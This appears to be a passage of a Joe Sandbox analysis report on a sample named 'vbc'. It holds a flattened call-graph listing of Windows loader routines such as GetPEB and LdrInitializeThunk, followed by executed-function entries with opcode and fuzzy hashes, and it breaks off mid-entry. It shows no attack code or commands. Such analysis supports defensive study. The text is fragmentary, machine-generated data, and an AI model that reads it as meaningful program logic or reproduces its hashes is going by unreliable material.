19815 15bb150 _vswprintf_s 12 API calls 19810->19815 19811->19793 19816 16217ab GetPEB 19811->19816 19819 15bb150 _vswprintf_s 12 API calls 19812->19819 19818 15bb150 _vswprintf_s 12 API calls 19813->19818 19820 1621643 GetPEB 19814->19820 19821 162157c GetPEB 19815->19821 19822 15bb150 _vswprintf_s 12 API calls 19816->19822 19817->19793 19823 162190f 19818->19823 19819->19823 19820->19793 19821->19791 19822->19793 19825 15bb150 _vswprintf_s 12 API calls 19823->19825 19826 16217e8 GetPEB 19824->19826 19827 1621931 GetPEB 19825->19827 19826->19793 19827->19828 19828->19621 19828->19622 19831 15da850 19829->19831 19852 15da39e 19829->19852 19830 16222bb GetPEB 19830->19831 19832 16222c7 GetPEB 19830->19832 19831->19830 19833 167a80d 28 API calls 19831->19833 19837 15daa3c 19831->19837 19838 15bb150 12 API calls _vswprintf_s 19831->19838 19839 1622376 19831->19839 19840 1672073 28 API calls 19831->19840 19845 1622385 19831->19845 19831->19852 19907 15dab40 19831->19907 19834 15bb150 _vswprintf_s 12 API calls 19832->19834 19833->19831 19834->19831 19835 167a80d 28 API calls 19835->19837 19841 16223cb GetPEB 19837->19841 19837->19852 19838->19831 19842 167a80d 28 API calls 19839->19842 19840->19831 19843 16223f6 19841->19843 19844 16223d7 GetPEB 19841->19844 19842->19845 19847 15bb150 _vswprintf_s 12 API calls 19843->19847 19846 15bb150 _vswprintf_s 12 API calls 19844->19846 19845->19835 19848 16223f1 19846->19848 19847->19848 19849 15bb150 _vswprintf_s 12 API calls 19848->19849 19850 162240d 19849->19850 19851 1672073 28 API calls 19850->19851 19850->19852 19851->19852 19852->19741 19853 15eabd8 19852->19853 19856 15eabf1 19853->19856 19854 15eac5f 19854->19741 19855 166fa2b 28 API calls 19855->19856 19856->19854 19856->19855 19915 15eac7b 19856->19915 19859 15db855 19858->19859 19864 15db77c 19858->19864 19861 167a80d 28 API calls 19859->19861 19859->19864 19860 1622bbf GetPEB 19862 1622bcb GetPEB 19860->19862 19863 1622be8 19860->19863 19861->19864 19865 15bb150 _vswprintf_s 12 API calls 19862->19865 19866 15bb150 _vswprintf_s 12 API calls 19863->19866 19864->19860 19879 15db78e 19864->19879 19867 1622be5 19865->19867 19866->19867 19869 15bb150 _vswprintf_s 12 API calls 19867->19869 19871 1622bfd 19869->19871 19876 1672073 28 API calls 19871->19876 19871->19879 19872 1622c18 19877 167a80d 28 API calls 19872->19877 19873 15da5b2 19873->19665 19874 15db7e2 19874->19873 19875 167a80d 28 API calls 19874->19875 19878 1622c3e 19875->19878 19876->19879 19877->19874 19878->19878 19879->19874 19972 15db8e4 19879->19972 19880 15db7ca 19880->19874 19881 15de4a0 28 API calls 19880->19881 19881->19874 19883 15b938f 19882->19883 19884 16137ee 19882->19884 19883->19884 19886 15b9397 19883->19886 19885 167a80d 28 API calls 19884->19885 19887 15b93ab 19885->19887 19888 15b93c3 19886->19888 19986 15b93cc 19886->19986 19887->19888 19890 167a80d 28 API calls 19887->19890 19891 15b9819 19888->19891 19890->19888 19892 15b9829 19891->19892 19901 15b984c 19891->19901 19893 15db8e4 30 API calls 19892->19893 19894 15b982e 19893->19894 19895 15b9839 19894->19895 19896 1613bbe 19894->19896 19990 15b988d 19895->19990 19900 167a80d 28 API calls 19896->19900 19897 15b987b 19897->19717 19897->19732 19897->19746 19898 167a80d 28 API calls 19902 1613be4 19898->19902 19900->19901 19901->19897 19901->19898 19902->19902 19904 1671446 _vswprintf_s 19903->19904 19905 15fb640 _vswprintf_s 12 API calls 19904->19905 19906 167149a 19905->19906 19906->19748 19908 15dabbb 19907->19908 19909 15dab6e 19907->19909 19908->19831 19909->19908 19910 167a80d 28 API calls 19909->19910 19911 15dabd0 19909->19911 19910->19911 19912 15dac01 19911->19912 19913 167a80d 28 API calls 19911->19913 19912->19908 19914 167a80d 28 API calls 19912->19914 19913->19912 19914->19912 19916 15eaca2 19915->19916 19918 15ead10 19915->19918 19948 15eacda 19916->19948 19960 15f96e0 LdrInitializeThunk 19916->19960 19920 15ead1e GetPEB 19918->19920 19961 1663c60 19918->19961 19922 15ead2c 19920->19922 19959 162a092 19920->19959 19925 15ead3c 19922->19925 19927 1629fa0 GetPEB 19922->19927 19923 162a0ba 19929 15bb150 _vswprintf_s 12 API calls 19923->19929 19924 162a09d GetPEB 19928 15bb150 _vswprintf_s 12 API calls 19924->19928 19932 1629fb3 GetPEB 19925->19932 19933 15ead47 GetPEB 19925->19933 19927->19925 19931 162a0b7 19928->19931 19929->19931 19930 1629f90 19930->19920 19934 15bb150 _vswprintf_s 12 API calls 19931->19934 19932->19933 19935 1629fc6 19932->19935 19936 1629fda 19933->19936 19937 15ead73 19933->19937 19934->19948 19938 16714fb 14 API calls 19935->19938 19936->19937 19939 1629fe3 GetPEB 19936->19939 19940 15ead7e GetPEB 19937->19940 19941 1629ff6 GetPEB 19937->19941 19942 1629fd5 19938->19942 19939->19937 19943 162a042 19940->19943 19944 15ead94 19940->19944 19941->19940 19945 162a009 19941->19945 19942->19933 19943->19944 19946 162a04b GetPEB 19943->19946 19944->19948 19950 15d7d50 GetPEB 19944->19950 19947 15d7d50 GetPEB 19945->19947 19946->19944 19949 162a00e 19947->19949 19948->19856 19951 162a012 GetPEB 19949->19951 19952 162a021 19949->19952 19953 162a063 19950->19953 19951->19952 19954 1671411 12 API calls 19952->19954 19955 162a076 19953->19955 19956 162a067 GetPEB 19953->19956 19957 162a03d 19954->19957 19958 1671411 12 API calls 19955->19958 19956->19955 19957->19940 19958->19959 19959->19923 19959->19924 19960->19918 19962 1629f74 19961->19962 19964 1663c78 19961->19964 19962->19920 19965 15f96e0 LdrInitializeThunk 19962->19965 19964->19962 19966 1663d40 19964->19966 19965->19930 19967 1663d7f 19966->19967 19968 1663e55 19967->19968 19970 1663e37 GetPEB 19967->19970 19969 15fb640 _vswprintf_s 12 API calls 19968->19969 19971 1663e65 19969->19971 19970->19967 19971->19962 19973 1622c43 19972->19973 19976 15db8fa 19972->19976 19974 1622c56 GetPEB 19973->19974 19973->19976 19977 1622c62 GetPEB 19974->19977 19978 1622c7f 19974->19978 19975 15db7bf 19975->19872 19975->19880 19976->19975 19982 15dab40 28 API calls 19976->19982 19979 15bb150 _vswprintf_s 12 API calls 19977->19979 19980 15bb150 _vswprintf_s 12 API calls 19978->19980 19981 1622c7c 19979->19981 19980->19981 19983 15bb150 _vswprintf_s 12 API calls 19981->19983 19982->19975 19984 1622c94 19983->19984 19984->19976 19985 1672073 28 API calls 19984->19985 19985->19976 19987 15b93df 19986->19987 19988 15b93e3 19986->19988 19987->19887 19989 15dbc04 28 API calls 19988->19989 19989->19987 19991 15b98a4 19990->19991 19993 15b98a0 19990->19993 19992 15de4a0 28 API calls 19991->19992 19992->19993 19993->19901 19994->19557 19995->19561 19996->19454 19998 1633bf3 19997->19998 19999 1633c05 19997->19999 20001 1633c54 19998->20001 19999->19482 20004 15fe3a0 20001->20004 20007 15fe3bd 20004->20007 20006 15fe3b8 20006->19999 20008 15fe3cc 20007->20008 20009 15fe3e3 20007->20009 20010 15fb58e _vswprintf_s 12 API calls 20008->20010 20011 15fb58e _vswprintf_s 12 API calls 20009->20011 20012 15fe3d8 _vswprintf_s 20009->20012 20010->20012 20011->20012 20012->20006 18060 15efab0 18061 15efb14 18060->18061 18062 15efac2 18060->18062 18063 15ceef0 27 API calls 18062->18063 18064 15efacd 18063->18064 18065 15efadf 18064->18065 18068 15efb18 18064->18068 18066 15ceb70 33 API calls 18065->18066 18067 15efaf1 18066->18067 18067->18061 18069 15efafa GetPEB 18067->18069 18075 162bdcb 18068->18075 18096 15c6d90 18068->18096 18069->18061 18070 15efb09 18069->18070 18106 15cff60 18070->18106 18074 162bea7 18076 15c76e2 GetPEB 18074->18076 18095 15efc4b 18074->18095 18075->18074 18078 15bb150 _vswprintf_s 12 API calls 18075->18078 18079 162be19 18075->18079 18076->18095 18077 15efba7 18081 15efbe4 18077->18081 18077->18095 18114 15efd22 18077->18114 18078->18079 18079->18074 18126 15c75ce 18079->18126 18083 162bf17 18081->18083 18084 15efc47 18081->18084 18081->18095 18085 15efd22 GetPEB 18083->18085 18083->18095 18086 15efd22 GetPEB 18084->18086 18084->18095 18088 162bf22 18085->18088 18089 15efcb2 18086->18089 18087 162be54 18090 162be92 18087->18090 18087->18095 18130 15c76e2 18087->18130 18091 15efd9b 3 API calls 18088->18091 18088->18095 18089->18095 18118 15efd9b 18089->18118 18090->18074 18094 15c76e2 GetPEB 18090->18094 18091->18095 18094->18074 18097 15c6dba 18096->18097 18098 15c6da4 18096->18098 18134 15f2e1c 18097->18134 18098->18075 18098->18077 18098->18095 18100 15c6dbf 18101 15ceef0 27 API calls 18100->18101 18102 15c6dca 18101->18102 18103 15c6dde 18102->18103 18139 15bdb60 18102->18139 18105 15ceb70 33 API calls 18103->18105 18105->18098 18107 15cff99 18106->18107 18109 15cff6d 18106->18109 18108 16888f5 33 API calls 18107->18108 18110 15cff94 18108->18110 18109->18107 18111 15cff80 GetPEB 18109->18111 18110->18061 18111->18107 18112 15cff8f 18111->18112 18251 15d0050 18112->18251 18115 15efd3a 18114->18115 18117 15efd31 _vswprintf_s 18114->18117 18115->18117 18285 15c7608 18115->18285 18117->18081 18119 15efdba GetPEB 18118->18119 18120 15efdcc 18118->18120 18119->18120 18121 15efdf2 18120->18121 18122 162c0bd 18120->18122 18125 15efdfc 18120->18125 18123 15c76e2 GetPEB 18121->18123 18121->18125 18124 162c0d3 GetPEB 18122->18124 18122->18125 18123->18125 18124->18125 18125->18095 18127 15c75db 18126->18127 18129 15c75eb 18126->18129 18128 15c7608 GetPEB 18127->18128 18127->18129 18128->18129 18129->18087 18131 15c76fd 18130->18131 18132 15c76e6 18130->18132 18131->18090 18132->18131 18133 15c76ec GetPEB 18132->18133 18133->18131 18135 15f2e32 18134->18135 18136 15f2e57 18135->18136 18147 15f9840 LdrInitializeThunk 18135->18147 18136->18100 18138 162df2e 18140 15bdb6d 18139->18140 18146 15bdb91 18139->18146 18140->18146 18148 15bdb40 GetPEB 18140->18148 18142 15bdb76 18142->18146 18150 15be7b0 18142->18150 18144 15bdb87 18145 1614fa6 GetPEB 18144->18145 18144->18146 18145->18146 18146->18103 18147->18138 18149 15bdb52 18148->18149 18149->18142 18151 15be7e0 18150->18151 18152 15be7ce 18150->18152 18153 15be7e8 18151->18153 18155 15bb150 _vswprintf_s 12 API calls 18151->18155 18152->18153 18158 15c3d34 18152->18158 18157 15be7f6 18153->18157 18197 15bdca4 18153->18197 18155->18153 18157->18144 18159 15c3d6c 18158->18159 18160 1618213 18158->18160 18213 15c1b8f 18159->18213 18164 161822b GetPEB 18160->18164 18182 15c4068 18160->18182 18162 15c3d81 18162->18160 18163 15c3d89 18162->18163 18165 15c1b8f 2 API calls 18163->18165 18164->18182 18166 15c3d9e 18165->18166 18167 15c3dba 18166->18167 18168 15c3da2 GetPEB 18166->18168 18169 15c1b8f 2 API calls 18167->18169 18168->18167 18170 15c3dd2 18169->18170 18172 15c3deb GetPEB 18170->18172 18170->18182 18186 15c3e91 18170->18186 18171 1618344 GetPEB 18174 15c407a 18171->18174 18188 15c3dfc _vswprintf_s 18172->18188 18173 15c1b8f 2 API calls 18177 15c3ea9 18173->18177 18175 1618363 GetPEB 18174->18175 18178 15c4085 18174->18178 18175->18178 18176 15c3f6a 18179 15c1b8f 2 API calls 18176->18179 18177->18176 18180 15c3ec2 GetPEB 18177->18180 18177->18182 18178->18151 18181 15c3f82 18179->18181 18195 15c3ed3 _vswprintf_s 18180->18195 18181->18182 18183 15c3f9b GetPEB 18181->18183 18182->18171 18182->18174 18196 15c3fac _vswprintf_s 18183->18196 18184 15c3e74 18184->18186 18187 15c3e81 GetPEB 18184->18187 18185 15c3e62 GetPEB 18185->18184 18186->18173 18187->18186 18188->18182 18188->18184 18188->18185 18189 15c3f3b GetPEB 18190 15c3f4d 18189->18190 18190->18176 18191 15c3f5a GetPEB 18190->18191 18191->18176 18192 15c404f 18192->18182 18194 15c4058 GetPEB 18192->18194 18193 1618324 GetPEB 18193->18182 18194->18182 18195->18182 18195->18189 18195->18190 18196->18182 18196->18192 18196->18193 18200 15bdcfd 18197->18200 18211 15bdd6f _vswprintf_s 18197->18211 18198 15bdd47 18228 15bdbb1 18198->18228 18200->18198 18208 15bdfc2 18200->18208 18219 15be620 18200->18219 18201 1614ff2 18201->18201 18205 15bdfae 18205->18208 18241 15f95d0 LdrInitializeThunk 18205->18241 18207 15fb640 _vswprintf_s 12 API calls 18209 15bdfe4 18207->18209 18208->18207 18209->18157 18211->18201 18211->18205 18211->18208 18235 15be375 18211->18235 18240 15f95d0 LdrInitializeThunk 18211->18240 18217 15c1ba9 _vswprintf_s 18213->18217 18218 15c1c05 18213->18218 18214 161701a GetPEB 18215 15c1c21 18214->18215 18215->18162 18216 15c1bf4 GetPEB 18216->18218 18217->18215 18217->18216 18217->18218 18218->18214 18218->18215 18220 1615503 18219->18220 18221 15be644 18219->18221 18221->18220 18242 15bf358 18221->18242 18223 15be725 18225 15be73b 18223->18225 18226 15be729 GetPEB 18223->18226 18225->18198 18226->18225 18227 15be661 _vswprintf_s 18227->18223 18246 15f95d0 LdrInitializeThunk 18227->18246 18247 15c766d 18228->18247 18230 15bdbcf 18230->18211 18231 15bdbf1 18230->18231 18232 15bdc05 18231->18232 18233 15c766d GetPEB 18232->18233 18234 15bdc22 18233->18234 18234->18211 18239 15be3a3 18235->18239 18236 15fb640 _vswprintf_s 12 API calls 18237 15be400 18236->18237 18237->18211 18238 1615306 18239->18236 18239->18238 18240->18211 18241->18208 18243 15bf370 18242->18243 18244 15bf38c 18243->18244 18245 15bf379 GetPEB 18243->18245 18244->18227 18245->18244 18246->18223 18249 15c7687 18247->18249 18248 15c76d3 18248->18230 18249->18248 18250 15c76c2 GetPEB 18249->18250 18250->18248 18252 15d0074 18251->18252 18253 15d009d GetPEB 18252->18253 18264 15d00ef 18252->18264 18254 161c01b 18253->18254 18255 15d00d0 18253->18255 18254->18255 18257 161c024 GetPEB 18254->18257 18259 15d00df 18255->18259 18260 161c037 18255->18260 18256 15fb640 _vswprintf_s 12 API calls 18258 15d0105 18256->18258 18257->18255 18258->18110 18265 15e9702 18259->18265 18269 1688a62 18260->18269 18263 161c04b 18263->18263 18264->18256 18266 15e9720 18265->18266 18268 15e9784 18266->18268 18276 1688214 18266->18276 18268->18264 18270 15d7d50 GetPEB 18269->18270 18271 1688a9d 18270->18271 18272 1688aa1 GetPEB 18271->18272 18273 1688ab1 _vswprintf_s 18271->18273 18272->18273 18274 15fb640 _vswprintf_s 12 API calls 18273->18274 18275 1688ad7 18274->18275 18275->18263 18278 168823b 18276->18278 18277 16882c0 18277->18268 18278->18277 18280 15e3b7a GetPEB 18278->18280 18284 15e3bb5 _vswprintf_s 18280->18284 18281 1626298 18282 15e3c1b GetPEB 18283 15e3c35 18282->18283 18283->18277 18284->18281 18284->18282 18284->18284 18286 15c7620 18285->18286 18287 15c766d GetPEB 18286->18287 18288 15c7632 18287->18288 18288->18117 18290 15f9670 18291 15f967a _vswprintf_s LdrInitializeThunk 18290->18291

                                                  Executed Functions

                                                  Function 015F9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 14 15f9910-15f991c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: afe0bb21bb325fe39a79f89ee9052d8ef281ab09dcdacb7ad91ef93389742336
                                                  • Instruction ID: b25239e2a34e636d315acf483ed44e5a8144e5fd1a56adb256d63869e0212406
                                                  • Opcode Fuzzy Hash: afe0bb21bb325fe39a79f89ee9052d8ef281ab09dcdacb7ad91ef93389742336
                                                  • Instruction Fuzzy Hash: 7F9002B120100402D14575D948057470009A7D0341F51C111A5054558ED6D98DD576A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 15 15f99a0-15f99ac LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bf20b1cf2f339d289857f8b22b80ba78186c2dbc0a3845873380d0c1587766e5
                                                  • Instruction ID: 00aa4d980954d8bcbc93976067aa8345a94b25e90ee78fcb2d9b66e304fb9d66
                                                  • Opcode Fuzzy Hash: bf20b1cf2f339d289857f8b22b80ba78186c2dbc0a3845873380d0c1587766e5
                                                  • Instruction Fuzzy Hash: CB9002A134100442D10565D94815B070009E7E1341F51C115E1054558DD699CC527166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 11 15f9840-15f984c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 61b7273f1702c587eb7572315920f74054becf8fca771557b61b378eb7d215cc
                                                  • Instruction ID: 2ea3677b0476c3af3d2e537ce4cee25f391bab04c2ec3a6f858238d77bcdfe90
                                                  • Opcode Fuzzy Hash: 61b7273f1702c587eb7572315920f74054becf8fca771557b61b378eb7d215cc
                                                  • Instruction Fuzzy Hash: 8A90026124204152554AB5D94805507400AB7E0281791C112A1404954CD5A69856E661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 12 15f9860-15f986c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 91a8b5b6a94f965c8fd481a77d3e8b566d32f0b7aaf7be57d0c42fb6e84957d6
                                                  • Instruction ID: aa486ee1aa682f33d556a754437db8363c7e4ddfeee97bb30ec3c385b9bb0e4b
                                                  • Opcode Fuzzy Hash: 91a8b5b6a94f965c8fd481a77d3e8b566d32f0b7aaf7be57d0c42fb6e84957d6
                                                  • Instruction Fuzzy Hash: ED90027120100413D11665D94905707000DA7D0281F91C512A041455CDE6D68952B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 15f98f0-15f98fc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 913907d5944086bd5999c0fdf13f3071b44547c851f17aa0719a2c362e0479f5
                                                  • Instruction ID: d1b4ce2f8edb12479f3766b1ebbb8530488bb215eac8e085cddfa413db59e50e
                                                  • Opcode Fuzzy Hash: 913907d5944086bd5999c0fdf13f3071b44547c851f17aa0719a2c362e0479f5
                                                  • Instruction Fuzzy Hash: ED90026160100502D10675D94805617000EA7D0281F91C122A1014559EDAA58992B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 74b1c5242e92981b15333be185b42c26adc21b470a0cb20a68ec4a106fdc9226
                                                  • Instruction ID: 459f187f1180e6dbe459204d04b4b3d06f95c8aa87235e2ceaa2e9cd3152d545
                                                  • Opcode Fuzzy Hash: 74b1c5242e92981b15333be185b42c26adc21b470a0cb20a68ec4a106fdc9226
                                                  • Instruction Fuzzy Hash: 0A90026121180042D20569E94C15B070009A7D0343F51C215A0144558CD99588616561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 16 15f9a00-15f9a0c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0a993462748325f56499d45431149bc441803c5df0e81ad689105f0d96b624f9
                                                  • Instruction ID: 85352d59e872dc86342299682a5a1245f37809cfbdc99af5082651e9ee1e009b
                                                  • Opcode Fuzzy Hash: 0a993462748325f56499d45431149bc441803c5df0e81ad689105f0d96b624f9
                                                  • Instruction Fuzzy Hash: 7D90027120140402D10565D94C1570B0009A7D0342F51C111A1154559DD6A5885175B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 17 15f9a20-15f9a2c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bb950724b4dbf6e2b86717ec194068e98db46db07b9e96e3d7017aa325dc0fc2
                                                  • Instruction ID: 44ecf8e73c9906de3928b89566130693710ef1369113a338a4cf1c06874c0ade
                                                  • Opcode Fuzzy Hash: bb950724b4dbf6e2b86717ec194068e98db46db07b9e96e3d7017aa325dc0fc2
                                                  • Instruction Fuzzy Hash: AD90026160100042414575E98C459074009BBE1251751C221A0988554DD5D9886566A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 15f9540-15f954c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 958ca7671c84f1d483ee84133b91c175b8e907b9ecd50576c032cd5839ca54d2
                                                  • Instruction ID: f0bcd3551d50560159a85b31b51b99b3a2622ebcdaccf4e561072a54dbdad8c1
                                                  • Opcode Fuzzy Hash: 958ca7671c84f1d483ee84133b91c175b8e907b9ecd50576c032cd5839ca54d2
                                                  • Instruction Fuzzy Hash: 6690026521100003010AA9D90B05507004AA7D5391351C121F1005554CE6A188616161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 15f95d0-15f95dc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 05061fcf9d3f5c21bcf38a578875f2e4bdd1a3a1a788228a92d9b5499463c596
                                                  • Instruction ID: 739dc3ebd5334b989923dee6aa0d12dd0d3b5d1a40ae509e98d90c5c382b6acd
                                                  • Opcode Fuzzy Hash: 05061fcf9d3f5c21bcf38a578875f2e4bdd1a3a1a788228a92d9b5499463c596
                                                  • Instruction Fuzzy Hash: 469002A120200003410A75D94815617400EA7E0241B51C121E1004594DD5A588917165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 8 15f9710-15f971c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9828718c0f509b2a3b8f4070a338f64379dfca9c66e421039655103d3192426a
                                                  • Instruction ID: 553f126def70663f4026cca2c4fbbdf4eea9c2989644bcfb46a24124b1f9674a
                                                  • Opcode Fuzzy Hash: 9828718c0f509b2a3b8f4070a338f64379dfca9c66e421039655103d3192426a
                                                  • Instruction Fuzzy Hash: 4C90027120100402D10569D958096470009A7E0341F51D111A5014559ED6E588917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1fe3b81aad7cd4511095025f84acca4180fb0f720937170f37d93d2bf47badbf
                                                  • Instruction ID: 336371d09262c380c46913849e4bbb3bf9c6202f7460e1488f0f327f189e2dd2
                                                  • Opcode Fuzzy Hash: 1fe3b81aad7cd4511095025f84acca4180fb0f720937170f37d93d2bf47badbf
                                                  • Instruction Fuzzy Hash: CA90027131114402D11565D988057070009A7D1241F51C511A081455CDD6D588917162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 9 15f9780-15f978c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ff4b968fbf5e0b5b32b45d03051269c5a77d4c9c88c09bb95959c8816ff6b897
                                                  • Instruction ID: f5d3ff6c638de9223406c7afc099e17568825aa87b95345b7b739585897fbacf
